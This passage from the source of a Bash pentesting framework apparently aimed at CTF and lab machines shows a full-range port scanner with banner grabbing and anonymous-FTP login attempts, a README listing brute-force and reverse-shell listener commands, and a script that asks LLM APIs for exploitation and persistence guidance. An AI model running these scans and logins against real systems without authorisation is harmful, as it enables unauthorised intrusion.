215 | (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null)
216 | spacer
217 | blue "Files used by network services:"
218 | lsof -i
219 | 
220 | purple "Open ports:"
221 | (netstat -punta || ss --ntpu) | grep "127.0"
222 | 
223 | red "Screens list:"
224 | screen -ls
225 | blue "Sessions list:"
226 | tmux ls
227 | 
228 | blue "Sniffing result: $(timeout 1 tcpdump)"
229 | spacer
230 | 


--------------------------------------------------------------------------------
/tools/port-scanner.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | Y=$(tput setaf 3)
  3 | M=$(tput setaf 5)
  4 | R=$(tput sgr0)
  5 | G=$(tput setaf 2)
  6 | RD=$(tput setaf 1)
  7 | B=$(tput setaf 4)
  8 | C=$(tput setaf 6)
  9 | BOLD=$(tput bold)
 10 | 
 11 | center() {
 12 |     local text="$1"
 13 |     local term_width=$(tput cols)
 14 |     printf "%*s\n" $(((${#text} + term_width) / 2)) "$text"
 15 | }
 16 | 
 17 | if [ $# -eq 0 ]; then
 18 |     center "${RD}Usage: $0 <target> [-u for UDP Scan]${R}"
 19 |     exit 1
 20 | fi
 21 | 
 22 | tgt="$1"
 23 | to=4
 24 | max_p=100  # Concurrent processes
 25 | udp=false
 26 | [[ "$2" == "-u" ]] && udp=true
 27 | 
 28 | domain_info() {
 29 |     local d="$1"
 30 |     center "${Y}Domain: $d${R}"
 31 |     local ip=$(host -t A $d | awk '/has address/ { print $4; exit }')
 32 |     center "${Y}IP: $ip${R}"
 33 | }
 34 | 
 35 | os_fp() {
 36 |     local ip="$1"
 37 |     local ttl=$(ping -c 1 -W 1 $ip 2>/dev/null | awk -F'ttl=' '/ttl=/{print $2}' | cut -d' ' -f1)
 38 |     if [ -z "$ttl" ]; then
 39 |         center "${RD}OS: Unknown (Host down/blocking ICMP)${R}"
 40 |     elif [ "$ttl" -le 64 ]; then
 41 |         center "${G}OS: Linux/Unix (TTL: $ttl)${R}"
 42 |     elif [ "$ttl" -le 128 ]; then
 43 |         center "${G}OS: Windows (TTL: $ttl)${R}"
 44 |     else
 45 |         center "${RD}OS: Unknown (TTL: $ttl)${R}"
 46 |     fi
 47 | }
 48 | 
 49 | ssh_conf(){
 50 | local lyn="$1"
 51 | local ssh_ver=$(timeout $to nc -w1 $tgt $lyn 2>/dev/null | grep -i ssh)
 52 | 
 53 | }
 54 | detailed_info() {
 55 |     local p="$1" proto="$2"
 56 |     local svc=$(grep -w "$p/$proto" /etc/services 2>/dev/null | awk '{print $1}' | head -1)
 57 |     local banner="" ver_info="" ssl_info="" http_info="" service_info="" robots_content=""
 58 | 
 59 |     case "$proto" in
 60 |         tcp)
 61 |             ver_info=$(timeout $to bash -c "echo '' | nc -v -w $to $tgt $p" 2>&1 | grep -v "open" | tr -d '\0' | tr -d '\r' | tr '\n' ' ' | cut -c 1-100)
 62 | 
 63 |             if echo | openssl s_client -connect $tgt:$p -quiet 2>/dev/null | grep -q "BEGIN CERTIFICATE"; then
 64 |                 ssl_info=$(openssl s_client -connect $tgt:$p -quiet 2>/dev/null | openssl x509 -noout -subject -issuer | tr '\n' ' ')
 65 |             fi
 66 | 
 67 |             case "$svc" in
 68 |                 ssh|22)
 69 |                     ssh_conf $p
 70 |                     ;;
 71 |                 http|http-alt|80|8080)
 72 |                    http_info=$(curl -sI $to "http://$tgt:$p")
 73 |                    robots_content=$(curl -sL -m $to "http://$tgt:$p/robots.txt")
 74 | 
 75 |                     ;;
 76 |                 https|https-alt|443|8443)
 77 |                    http_info=$(curl -sI  $to "https://$tgt:$p")
 78 |                    robots_content=$(curl -sL -m $to "https://$tgt:$p/robots.txt")
 79 | 
 80 |                     ;;
 81 |                 ftp|21)
 82 |                     ftp_banner=$(timeout $to nc -w1 $tgt $p </dev/null 2>&1 | grep -i ftp)
 83 |                     service_info="${C}FTP Banner: $ftp_banner${R}"
 84 |                     anon_login=$(timeout $to ftp -n $tgt $p <<EOF
 85 | user anonymous anonymous@$tgt
 86 | pass anonymous
 87 | EOF
 88 | )
 89 |                     if echo "$anon_login" | grep -q "230 Login successful"; then
 90 |                         center "${G}Anonymous FTP login successful${R}"
 91 |                     else
 92 |                         center "${RD}Anonymous FTP login failed${R}"
 93 |                     fi
 94 |                     ;;
 95 |                 mysql|3306)
 96 |                     mysql_info=$(timeout $to mysqladmin -h $tgt -P $p version 2>/dev/null)
 97 |                     if [ ! -z "$mysql_info" ]; then
 98 |                         center "${C}MySQL Info:${R}"
 99 |                         echo "$mysql_info" | sed 's/^/    /'
100 |                     else
101 |                         center "${RD}Unable to retrieve MySQL version info${R}"
102 |                     fi
103 |                     ;;
104 |                 mssql|1433)
105 |                     mssql_info=$(timeout $to nmap -p $p --script ms-sql-info $tgt 2>/dev/null | grep -v "^#")
106 |                     if [ ! -z "$mssql_info" ]; then
107 |                         service_info="${C}MSSQL Info:${R}"
108 |                         echo "$mssql_info" | sed 's/^/    /'
109 |                     else
110 |                         center "${RD}Unable to retrieve MSSQL info${R}"
111 |                     fi
112 |                     ;;
113 |                 dns|53)
114 |                     dns_info=$(timeout $to dig -x $tgt @$tgt -p $p +short 2>/dev/null)
115 |                     if [ ! -z "$dns_info" ]; then
116 |                         service_info="${C}DNS Reverse Lookup Info:${R}"
117 |                         echo "$dns_info" | sed 's/^/    /'
118 |                     else
119 |                         center "${RD}Unable to retrieve DNS reverse lookup info${R}"
120 |                     fi
121 |                     ;;
122 |                 redis|6379)
123 |                     redis_info=$(timeout $to redis-cli -h $tgt -p $p info 2>/dev/null | grep "redis_version:")
124 |                     if [ ! -z "$redis_info" ]; then
125 |                        service_info="${C}Redis Version Info: $redis_info${R}"
126 |                     else
127 |                         center "${RD}Unable to retrieve Redis version info${R}"
128 |                     fi
129 |                     ;;
130 |                 *)
131 |                     service_info=$(timeout $to nc -w1 $tgt $p </dev/null 2>&1 | grep -a -v "Connection to" | tr -d '\0' | tr -d '\r' | tr '\n' ' ' | cut -c 1-100)
132 |                     if [ ! -z "$service_info" ]; then
133 |                         service_info="${C}Service Info: $service_info${R}"
134 |                     else
135 |                         service_info="${RD}Unable to retrieve specific service info${R}"
136 |                     fi
137 |                     ;;
138 |             esac
139 |             ;;
140 | 
141 |     esac
142 |     echo " ";
143 |     center "${B}Port: $p${R}"
144 |     center "${C}Protocol: $proto${R}"
145 |     if [ ! -z "$ssh_ver" ]; then
146 |         center "${C}SSH Version: $ssh_ver${R}"
147 |         local ciphers=$(timeout $to ssh -vv -oCiphers=+aes128-cbc -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss $tgt -p $p 2>&1 | grep -a "kex: server->client" | sed 's/.*\[//;s/\].*//')
148 |         center "${C}SSH Ciphers: $ciphers${R}"
149 |     fi
150 | if  [ ! -z "$svc" ];then
151 |  center "${C}Service Info: $svc${R}"
152 | fi
153 | # if [ ! -z "$ver_info" ]; then
154 | #     center "${M}Version Info: $ver_info${R}"
155 | # fi
156 | 
157 | [ ! -z "$ssl_info" ] && center "${C}SSL Info: $ssl_info${R}"
158 | if [ ! -z "$http_info" ]; then
159 |     center "${B}HTTP Info:${R}"
160 |         f=$(echo "$http_info" | head -n 1)
161 |         s=$(echo "$http_info" | grep -i '^server:' | awk -F: '{print $2}' | xargs)
162 |     center "${C} HTTP VERSION :${BOLD} $f"
163 |     center "${C} SERVER : ${BOLD} $s"
164 | 
165 | fi
166 |     # [ ! -z "$service_info" ] && center "${C}Service Info: $service_info${R}"
167 | 
168 |     if [[ "$svc" == "https" || "$svc" == "http" || "$svc" == "http-alt" || "$svc" == "https-alt" ]]; then
169 |         if [ ! -z "$robots_content" ]; then
170 |             center "${M}robots.txt content:${R}"
171 |             center  "$robots_content" | sed 's/^//'
172 |         else
173 |             center "${M}No robots.txt found or empty${R}"
174 |         fi
175 |     fi
176 |     center "${M}----------------------------------------${R}"
177 | }
178 | 
179 | 
180 | scan() {
181 |     local p=$1 proto=$2
182 |     if timeout $to bash -c "echo >/dev/$proto/$tgt/$p" 2>/dev/null ||
183 |        nc -z -w $to $tgt $p 2>/dev/null; then
184 |         center "Port ${G}${BOLD}$p is open ${R}"
185 |         detailed_info $p $proto
186 |     fi
187 | }
188 | echo ""
189 | center "${M}||===========================================||${R}"
190 | center "${Y}  Starting Ports-Scan on Target : $tgt ${R}"
191 | center "${M}||===========================================||${R}"
192 | echo ""
193 | domain_info $tgt
194 | os_fp $tgt
195 | echo ""
196 | 
197 | common_ports=(21 22 23 25 53 80 85 110 111 135 139 143 443 445 993 995 1337 1723 3306 3389 5900 8080
198 |               8443 8888 9418 27017 27018 50000 50070 50075 5432 5672 6379 7001 7002 8000 8001
199 |               8005 8081 8088 8090 8091 8444 8880 8883 9000 9001 9042 9060 9080 9092 9200 9300
200 |               9999 11211 15672 18080 19888 27016 50030 50060 50090 5044 5601 6000 7007 7180
201 |               7443 7777 8002 8060 8082 8089 8099 8123 8181 8383 8744 8889 8983 9002 9069 9090
202 |               9207 9306 9443 9800 9990 10000 11300 14222 14444 16010 18081 19000 19889 27015
203 |               27019 34443 50070 51111 54321 55555 55672 60010 60030 61440 65535)
204 | center "${B}Scanning common TCP ports...${R}"
205 | center "${M}----------------------------${R}"
206 | 
207 | for p in "${common_ports[@]}"; do
208 |     scan $p "tcp" &
209 |     while [ $(jobs -r | wc -l) -ge $max_p ]; do
210 |         sleep 0.1
211 |     done
212 | done
213 | wait
214 | 
215 | center "${B}Scanning remaining TCP ports (1-65535)...${R}"
216 | for ((p=1; p<=65535; p++)); do
217 |     if [[ ! " ${common_ports[*]} " =~ " ${p} " ]]; then
218 |         scan $p "tcp" &
219 |         while [ $(jobs -r | wc -l) -ge $max_p ]; do
220 |             sleep 0.1
221 |         done
222 |     fi
223 | done
224 | wait
225 | if $udp; then
226 |     center "${B}Scanning UDP ports (1-65535)...${R}"
227 |     for ((p=1; p<=65535; p++)); do
228 |         scan $p "udp" &
229 |         while [ $(jobs -r | wc -l) -ge $max_p ]; do
230 |             sleep 0.1
231 |         done
232 |     done
233 |     wait
234 | fi
235 | 
236 | center "${G}Sh0zack : PORT SCANNING IS DONE!${R}"
237 | 


--------------------------------------------------------------------------------
/Readme.md:
--------------------------------------------------------------------------------
  1 | 
  2 | <h1 align="center">Sh0zack 1.0</h1>
  3 | <div align="center">
  4 |  <img src='./assests/67732f97-297a-4048-9dc5-f64dad5c009c.png' altsrc ='https://github.com/sh0z3n/Sh0zack/assests/67732f97-297a-4048-9dc5-f64dad5c009c.png'height='330' >
  5 | </div>
  6 | <div align="center">
  7 |   <b>Sh0zack</b>  : Advanced Penetration Testing Framework | Powered by Bash <br>
  8 |   
  9 |   Supports  <b><i> THM & HTB Machines, CTFs, and Real-World Pentesting</i></b><br>
 10 |   <br>
 11 |   [![GitHub Forks](https://img.shields.io/github/forks/sh0z3n/Sh0zack?style=for-the-badge&labelColor=blue&color=violet&logo=github)](https://github.com/sh0z3n/Sh0zack/fork)
 12 |   <img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/sh0z3n/Sh0zack?style=for-the-badge&labelColor=blue&color=violet">
 13 |   <img alt="Static Badge" src="https://img.shields.io/badge/Tested--on-Linux-violet?style=for-the-badge&logo=linux&logoColor=black&labelColor=blue">
 14 |   <img alt="Static Badge" src="https://img.shields.io/badge/Bash-violet?style=for-the-badge&logo=gnubash&logoColor=black&labelColor=blue">
 15 |   <p></p>
 16 |     <a href="https://github.com/sh0z3n/Sh0zack?tab=readme-ov-file#installation">Install</a>
 17 |   <span> • </span>
 18 |        	<a href="https://github.com/sh0z3n/Sh0zack?tab=readme-ov-file#documentation">Documentation</a>
 19 |   <span> • </span>
 20 | 	<a href="https://github.com/sh0z3n/Sh0zack?tab=readme-ov-file#usage">Usage</a>
 21 |   <p></p>
 22 | </div>
 23 | 
 24 | ## 🗂️ Documentation
 25 | 
 26 | ###  FEATURES : ⚙️
 27 | <!--- 
 28 | maybe this will be included in a c2 server set up  , very sooooon ?
 29 | --->
 30 | 
 31 | | Feature                     | Description                                                                                          |
 32 | |-----------------------------|------------------------------------------------------------------------------------------------------|
 33 | | **Port Scanning**            | Scan open ports using Nmap, Rustscan, or the Sh0zack Port Scan Tool.                                  |
 34 | | **DNS Enumeration**             | Discover subdomains with Gobuster or the Advanced Sh0zack DNS Scan Tool.                              |
 35 | | **Directory Fuzzer**       | Enumerate directories and files using Gobuster, WFuzz, or the Sh0zack Directory Scan Tool.            |
 36 | | **Brute Force**              | Perform brute force attacks with Hydra or the Sh0zack Brute Force Tool.                               |
 37 | | **Listener Setter**          | Code to set up a listener to catch reverse shells.                                                     |
 38 | | **Privilege Escalation Check**| Custom binary ( **only for linux systems** ) to identify potential privilege escalation vectors.                            |
 39 | | **Shell Generator**          | Generate various types of reverse and bind shells (e.g., Bash, Python, Netcat, PHP, etc.).            |
 40 | | **Decrypting Tools**         | Decrypt encoded data using multiple methods.                                                         |
 41 | | **Web Scanner**              | Scan websites for vulnerabilities using Nikto, OWASP ZAP, Skipfish, WPScan, or CMSmap.                |
 42 | | **AI Chat**                  | integrated AI tool to chat about pentesting
 43 | 
 44 | ###  MODULES  : 📦
 45 | * The Logic of this tool is also including providing each functionality to be independent and easy to use without the need of other tools
 46 | 
 47 | #### Network Reconnaissance :
 48 | * Use Nmap,Smb , Rustscan, or Sh0zack's custom tool to scan a network
 49 | ```bash
 50 | nmap -sV -Pn <target-ip>
 51 | rustscan -a <target-ip>
 52 | ./tools/portscan.sh <target-ip> -o <output-file>
 53 | ```
 54 | #### DNS Enumerating :
 55 | * Enumerate subdomains using Gobuster or Sh0zack's Advanced DNS Scan Tool.
 56 | 
 57 | ```bash
 58 | gobuster dns -d <domain> -w <wordlist> -o <output-file>
 59 | ./tools/dns.sh -u <url> -w <wordlist> -o <output-file> -t <threads> -T <timeout> -n -v
 60 | ```
 61 | 
 62 | 
 63 | 
 64 | #### Directory Fuzzing :
 65 | * Use Gobuster, WFuzz, or Sh0zack's custom tool to find hidden directories and files.
 66 | 
 67 | ```Bash
 68 | gobuster dir -u <url> -w <wordlist> -x php,html,txt -o <output-file>
 69 | ./tools/dirscan.sh -u <url> -w <wordlist> -o <output-file> -t <threads> -T <timeout>
 70 | ```
 71 | #### Brute - Force  :
 72 | * Perform brute-force attacks on many services like ssh and ftp and http  , using  Sh0zack's custom brute force tool
 73 | 
 74 | ```bash
 75 | hydra -L <userlist> -P <passwordlist> <target-ip> ssh
 76 | ./tools/bruteforce.sh -u <user> -p <password> -t <target-ip> -s ssh
 77 | ```
 78 | #### Listener Setter :
 79 | * Set up a listener to catch reverse shells using Netcat or Sh0zack's custom script
 80 | 
 81 | [//]:# ( this will become among a c2 server funconality in veryyy near future , wanna colaborate ? dm me through socials at top of acc)
 82 | 
 83 | ```bash nc -nvlp <port>
 84 | ./tools/listener.sh -p <port>
 85 | ```
 86 | <dog>
 87 | 
 88 | #### Auto Privilege Escalation  :
 89 | 
 90 | * check potential privilege escalation vectors on a Linux system ( yet to have it on windows)
 91 | 
 92 | ```bash
 93 | ./tools/privesc.sh
 94 | ```
 95 | 
 96 | #### Decrypting Tools :
 97 | * Decrypt encoded data using Base64, Hex, or other encryption methods.
 98 | 
 99 | ``` bash
100 |  ./tools/decrypt.sh -e base64 -i <input-file> -o <output-file>
101 | ```
102 | 
103 | #### Web Scanner :
104 | *Scan websites for vulnerabilities using tools like Nikto, OWASP ZAP, WPScan, and others.
105 | 
106 | ```bash
107 | nikto -h <target-website>
108 | wpscanner --url <target-url>
109 | ./tools/webscan.sh -u <url> -o <output-file>
110 | ````
111 | * SQLi, XSS detection and WAF bypass are in the way ... 
112 | <br>
113 | 
114 | ## 🛠️ Some Tools Showcase :
115 | 
116 | | Tool | Description | Usage |
117 | |------|-------------|-------|
118 | | 🔍 DNS Scanner | Fast and customizable DNS enumeration | `./tools/dns.sh -u <url> -w <wordlist> -o <output_file> -t <threads> -T <timeout> -n -v` |
119 | | 🖧 Port Scanner | Efficient multi-threaded port scanning | `./tools/port-scanner.sh <target>` |
120 | | 📁 Directory Scanner | Discover hidden directories and files | `./tools/dir.sh -u <url> -w <wordlist> -o <output_file> -t <threads> -T <timeout> -v` |
121 | | 🔐 SSL Analyzer | Evaluate SSL/TLS security configurations | `./tools/ssl-analyzer.sh <domain>` |
122 | | 🕷️ Web Crawler | Recursively map website structure | `./tools/webcrawler.sh -u <url> -d <depth> -o <output_file>` |
123 | 
124 | ... and many more powerful tools!
125 | 
126 | <br>
127 | 
128 | # Installation : 
129 | ```chkoupy
130 | git clone https://github.com/sh0z3n/Sh0zack.git
131 | cd Sh0zack
132 | ./sh0zack.sh
133 | ```
134 | 
135 | ### Tip : 
136 | for internal tools installation  use :
137 | ``` bash 
138 | chmod +x/scripts/install.sh && ./install.sh 
139 | ```
140 | for wordlists generation : 
141 | ``` bash 
142 | chmod +x/scripts/get-wordlists.sh && ./get-wordlists.sh 
143 | ```
144 | 
145 | ## 🚀 Features
146 | 
147 | - 🚄 **High-speed scanning** with multi-threading support
148 | 
149 | - 🎨 **Customizable output formats** (JSON, CSV, XML)
150 | - 🔧 **Modular design** for easy integration and expansion
151 | 
152 | - 📊 **Detailed reporting** with vulnerability assessment
153 | 
154 | - 🔒 **Built-in security measures** to prevent abuse
155 | 
156 | <br>
157 | 
158 | ## 🤝 Contributing 
159 | 
160 | We invite you to contribute to **Sh0zack** by adding new modules, improving code logic, or creating odd scripts. 
161 | 
162 | - Fork the repository and submit a pull request after working on your branch. Most pull requests will be reviewed and approved within ```24``` **hours** ! <br></br>
163 | <div align="center">
164 |   <img alt="New Badge" src="https://img.shields.io/badge/Contributions-Welcome-violet?style=for-the-badge&labelColor=blue&color=violet">
165 | </div>
166 | 
167 | ## 📊 Some Meaning-less Statistics
168 | <p align="center">
169 |   <img src="https://img.shields.io/github/downloads/sh0z3n/Sh0zack/total?style=for-the-badge&color=blue" alt="Downloads">
170 |   <img src="https://img.shields.io/github/last-commit/sh0z3n/Sh0zack?style=for-the-badge&color=blue" alt="Last Commit">
171 |   <img src="https://img.shields.io/github/issues-raw/sh0z3n/Sh0zack?style=for-the-badge&color=blue" alt="Open Issues">
172 |   <img src="https://img.shields.io/github/issues-closed-raw/sh0z3n/Sh0zack?style=for-the-badge&color=blue" alt="Closed Issues">
173 | </p>
174 | <a href="https://star-history.com/#sh0z3n/Sh0zack&Timeline">
175 |  <picture>
176 |    <source media="(prefers-color-scheme: dark)" srcset="https://api.star-history.com/svg?repos=sh0z3n/Sh0zack&type=Timeline&theme=dark" />
177 |    <source media="(prefers-color-scheme: light)" srcset="https://api.star-history.com/svg?repos=sh0z3n/Sh0zack&type=Timeline" />
178 |   <center> 
179 |   <img alt="Star History Chart" src="https://api.star-history.com/svg?repos=sh0z3n/Sh0zack&type=Timeline" />
180 |   </center>
181 |  </picture>
182 | </a>
183 | 
184 | <!-- ## 📜 License
185 | This project is licensed under the MIT License - see the LICENSE file for details. -->
186 | <br> </br>
187 | 
188 | ## 👨‍💻 Author
189 | 
190 | <div align="center">
191 | <!-- <a href="https://x.com/Mokhtar_Derbazi">
192 | <img src="https://github.com/sh0z3n.png" width="100px" style="border-radius:50%"> </div> </a> -->
193 | <!-- <a href="https://www.linkedin.com/in/mokhtarderbazi"> @sh0z3n  -->
194 | <br></br>
195 | <p align="center">
196 |   <a href="https://www.linkedin.com/in/mokhtar-derbazi/">
197 |     <img src="https://img.shields.io/badge/LinkedIn-Connect-blue?style=for-the-badge&logo=linkedin" alt="LinkedIn">
198 |   </a>
199 |   <a href="https://x.com/Mokhtar_Derbazi">
200 |     <img src="https://img.shields.io/badge/Twitter-Follow-blue?style=for-the-badge&logo=twitter" alt="Twitter">
201 |   </a>
202 | </p>
203 | 
204 | <!-- ## contrbuters : if they exist  -->
205 | 
206 | 
207 | <br>
208 | <center > <b>  Built with ❤️ for future security researchers worldwide </center>
209 | 
210 | </div>
211 | 


--------------------------------------------------------------------------------
/tools/ai.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | 
  3 | # ANSI color 
  4 | BOLD='\033[1m'
  5 | RED='\033[0;31m'
  6 | GREEN='\033[0;32m'
  7 | YELLOW='\033[0;33m'
  8 | BLUE='\033[0;34m'
  9 | MAGENTA='\033[0;35m'
 10 | CYAN='\033[0;36m'
 11 | RESET='\033[0m'
 12 | 
 13 | # AI Providers llms 
 14 | GEMINI_KEY="GEMINI-KEY"
 15 | OPENAI_KEY="OPENai key"
 16 | CLAUDE_KEY="YOUR_CLAUDE_API_KEY"
 17 | KNOWLEDGE_GRAPH_API_KEY="YOUR_KNOWLEDGE_GRAPH_API_KEY" # .
 18 | 
 19 | function choose_ai_provider() {
 20 |     echo -e "${BLUE} Choose AI Provider: ${YELLOW}1. Gemini ${YELLOW}2. OpenAI ${YELLOW}3. Claude ${YELLOW}4. Knowledge Graph ${RESET}"
 21 |     read -p "Select (1-4): " AI_CHOICE
 22 | 
 23 |     case $AI_CHOICE in
 24 |         1)
 25 |             AI_PROVIDER="Gemini"
 26 |             ENDPOINT="https://generativelanguage.googleapis.com/v1beta/models/gemini-1.5-flash:generateContent?key=$GEMINI_KEY"
 27 |             ;;
 28 |         2)
 29 |             AI_PROVIDER="OpenAI"
 30 |             ENDPOINT="https://api.openai.com/v1/chat/completions"
 31 |             ;;
 32 |         3)
 33 |             AI_PROVIDER="Claude"
 34 |             ENDPOINT="https://api.anthropic.com/v1/claude" # Replace with the actual Claude endpoint if available
 35 |             ;;
 36 |         4)
 37 |             AI_PROVIDER="Knowledge Graph"
 38 |             ENDPOINT="https://kgsearch.googleapis.com/v1/entities:search?key=$KNOWLEDGE_GRAPH_API_KEY"
 39 |             ;;
 40 |         *)
 41 |             echo -e "${RED} Invalid choice. Exiting... ${RESET}"
 42 |             exit 1
 43 |             ;;
 44 |     esac
 45 | }
 46 | 
 47 | function typewriter() {
 48 |     local text="$1"
 49 |     local delay=0.06
 50 |     for (( i=0; i<${#text}; i++ )); do
 51 |         echo -ne "${text:i:1}"
 52 |         sleep $delay
 53 |     done
 54 |     echo
 55 | }
 56 | 
 57 | function send_request() {
 58 |     local user_input="$1"
 59 |     local response=""
 60 | 
 61 |     if [ "$AI_PROVIDER" == "Gemini" ]; then
 62 |         response=$(curl -s -H 'Content-Type: application/json' \
 63 |           -d "{\"contents\":[{\"parts\":[{\"text\":\"$user_input\"}]}]}" \
 64 |           -X POST "$ENDPOINT")
 65 |     elif [ "$AI_PROVIDER" == "OpenAI" ]; then
 66 |         response=$(curl -s -H "Authorization: Bearer $OPENAI_KEY" \
 67 |           -H "Content-Type: application/json" \
 68 |           -d "{\"model\": \"gpt-3.5-turbo\", \"messages\":[{\"role\":\"user\", \"content\":\"$user_input\"}]}" \
 69 |           -X POST "$ENDPOINT")
 70 |     elif [ "$AI_PROVIDER" == "Claude" ]; then
 71 |         response=$(curl -s -H "Authorization: Bearer $CLAUDE_KEY" \
 72 |           -H "Content-Type: application/json" \
 73 |           -d "{\"prompt\":\"$user_input\",\"max_tokens\":1000}" \
 74 |           -X POST "$ENDPOINT")
 75 |     elif [ "$AI_PROVIDER" == "Knowledge Graph" ]; then
 76 |         response=$(curl -s -H "Content-Type: application/json" \
 77 |           -d "{\"query\":\"$user_input\",\"limit\":1,\"types\":[]}" \
 78 |           -X GET "$ENDPOINT")
 79 |     fi
 80 | 
 81 |     echo "$response"
 82 | }
 83 | 
 84 | function display_response() {
 85 |     local response="$1"
 86 |     local res=$(echo "$response" | jq -r '.candidates[0].content.parts[0].text // .choices[0].message.content // .result.entities[0].description' | tr -d '\r\n' | sed 's/^[ \t]*//;s/[ \t]*$//')
 87 | 
 88 |     echo -e "${MAGENTA}===================================================${RESET}"
 89 |     
 90 |     echo -e "${CYAN}AI RESPONSE:${RESET}"
 91 |     echo -e "${YELLOW}---------------------------------------------------${RESET}"
 92 | 
 93 |     #  wrap long lines using the fold command ! 
 94 |     echo -e "${GREEN}${BOLD}$(echo "$res" | fold -s -w 90)${RESET}"
 95 |     
 96 |     echo -e "${MAGENTA}===================================================${RESET}"
 97 | }
 98 | 
 99 | # function analyze_user_intent() { idk but it's not the best approach to help by just analyzing what u send
100 | #     local user_input="$1"
101 | #     local response=$(send_request "user's intent based on the input: $user_input?")
102 | #     local intent=$(echo "$response" | jq -r '.candidates[0].content.parts[0].text // .choices[0].message.content // .result.entities[0].description' | tr -d '\r\n' | sed 's/^[ \t]*//;s/[ \t]*$//')
103 | 
104 | #     echo "$intent"
105 | # }
106 | 
107 | function provide_ctf_guidance() {
108 |     local challenge_type=$1
109 |     local response=""
110 | 
111 |     if [ "$challenge_type" == "Cryptography" ]; then
112 |         response=$(send_request "As an AI assistant, please provide step-by-step guidance on how to approach and solve cryptography-based CTF challenges.")
113 |     elif [ "$challenge_type" == "Steganography" ]; then
114 |         response=$(send_request "As an AI assistant, please provide step-by-step guidance on how to approach and solve steganography-based CTF challenges.")
115 |     elif [ "$challenge_type" == "Reverse Engineering" ]; then
116 |         response=$(send_request "As an AI assistant, please provide step-by-step guidance on how to approach and solve reverse engineering-based CTF challenges.")
117 |     elif [ "$challenge_type" == "Binary Exploitation" ]; then
118 |         response=$(send_request "As an AI assistant, please provide step-by-step guidance on how to approach and solve binary exploitation-based CTF challenges.")
119 |     elif [ "$challenge_type" == "Web Hacking" ]; then
120 |         response=$(send_request "As an AI assistant, please provide step-by-step guidance on how to approach and solve web hacking-based CTF challenges.")
121 |     else
122 |         response=$(send_request "As an AI assistant, please provide general guidance on how to approach and solve CTF challenges.")
123 |     fi
124 | 
125 |     display_response "$response"
126 | }
127 | 
128 | function provide_pentesting_guidance() {
129 |     local task=$1
130 |     local response=""
131 | 
132 |     if [ "$task" == "Network Reconnaissance" ]; then
133 |         response=$(send_request "As an AI assistant, please provide detailed guidance on how to perform effective network reconnaissance using the Sh0zack tool.")
134 |     elif [ "$task" == "Vulnerability Identification" ]; then
135 |         response=$(send_request "As an AI assistant, please provide guidance on how to identify vulnerabilities in target systems and web applications using the Sh0zack tool.")
136 |     elif [ "$task" == "Exploitation" ]; then
137 |         response=$(send_request "As an AI assistant, please provide guidance on how to perform exploitation techniques using the Sh0zack tool, including the use of appropriate tools and methods.")
138 |     elif [ "$task" == "Privilege Escalation" ]; then
139 |         response=$(send_request "As an AI assistant, please provide guidance on how to identify and exploit privilege escalation vectors on a target system using the Sh0zack tool.")
140 |     elif [ "$task" == "Maintaining Access" ]; then
141 |         response=$(send_request "As an AI assistant, please provide guidance on how to maintain access to a target system using the Sh0zack tool, including the use of listeners and other techniques.")
142 |     elif [ "$task" == "Reporting and Documentation" ]; then
143 |         response=$(send_request "As an AI assistant, please provide guidance on how to effectively document the findings and steps taken during a penetration testing engagement using the Sh0zack tool.")
144 |     else
145 |         response=$(send_request "As an AI assistant, please provide general guidance on how to perform effective penetration testing using the Sh0zack tool.")
146 |     fi
147 | 
148 |     display_response "$response"
149 | }
150 | 
151 | function provide_tool_guidance() {
152 |     local tool=$1
153 |     local response=""
154 | 
155 |     if [ "$tool" == "portscan.sh" ]; then
156 |         response=$(send_request "As an AI assistant, please provide detailed guidance on how to use the ./tools/portscan.sh tool for efficient port scanning.")
157 |     elif [ "$tool" == "dns.sh" ]; then
158 |         response=$(send_request "As an AI assistant, please provide detailed guidance on how to use the ./tools/dns.sh tool for effective DNS enumeration.")
159 |     elif [ "$tool" == "dirscan.sh" ]; then
160 |         response=$(send_request "As an AI assistant, please provide detailed guidance on how to use the ./tools/dirscan.sh tool for directory fuzzing and file discovery.")
161 |     elif [ "$tool" == "bruteforce.sh" ]; then
162 |         response=$(send_request "As an AI assistant, please provide detailed guidance on how to use the ./tools/bruteforce.sh tool for brute-force attacks.")
163 |     elif [ "$tool" == "listener.sh" ]; then
164 |         response=$(send_request "As an AI assistant, please provide detailed guidance on how to use the ./tools/listener.sh tool for setting up a listener to catch reverse shells.")
165 |     elif [ "$tool" == "privesc.sh" ]; then
166 |         response=$(send_request "As an AI assistant, please provide detailed guidance on how to use the ./tools/privesc.sh tool for identifying potential privilege escalation vectors.")
167 |     elif [ "$tool" == "decrypt.sh" ]; then
168 |         response=$(send_request "As an AI assistant, please provide detailed guidance on how to use the ./tools/decrypt.sh tool for decrypting encoded data.")
169 |     elif [ "$tool" == "webscan.sh" ]; then
170 |         response=$(send_request "As an AI assistant, please provide detailed guidance on how to use the ./tools/webscan.sh tool for web vulnerability scanning.")
171 |     else
172 |         response=$(send_request "As an AI assistant, please provide general guidance on the various tools available in the Sh0zack framework.")
173 |     fi
174 | 
175 |     display_response "$response"
176 | }
177 | 
178 | 
179 | function AI () {
180 |     choose_ai_provider
181 | 
182 |     typewriter "$(echo -e "${RED}Ai is Ready ...${RESET}")"
183 | 
184 |     echo -e "${YELLOW}Welcome to Sh0zack AI-powered CTF and Penetration Testing Assistant! How can I help you today? ${RESET}"
185 | 
186 |     while true; do
187 |         read -p "$(echo -e '\e[5m'"${BLUE} => ${RESET}"'\e[0m')" AI_PROMPT
188 | 
189 |         response=$(send_request "$AI_PROMPT")
190 |         display_response "$response"
191 | 
192 |     done
193 | }
194 | 
195 | AI  


--------------------------------------------------------------------------------
/sh0zack.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | # ansi colors variations just to enhance the experience 
  3 | PROMPT="sh0zack >"
  4 | RED='\033[0;31m'
  5 | GREEN='\033[0;32m'
  6 | YELLOW='\033[1;33m'
  7 | BLUE='\033[0;34m'
  8 | MAGENTA='\033[0;35m'
  9 | CYAN='\033[0;36m'
 10 | RESET='\033[0m'
 11 | BOLD='\033[1m'
 12 | NORMAL='\033[0m'
 13 | cmd_ulach() {
 14 |     if ! command -v "$1" &> /dev/null; then
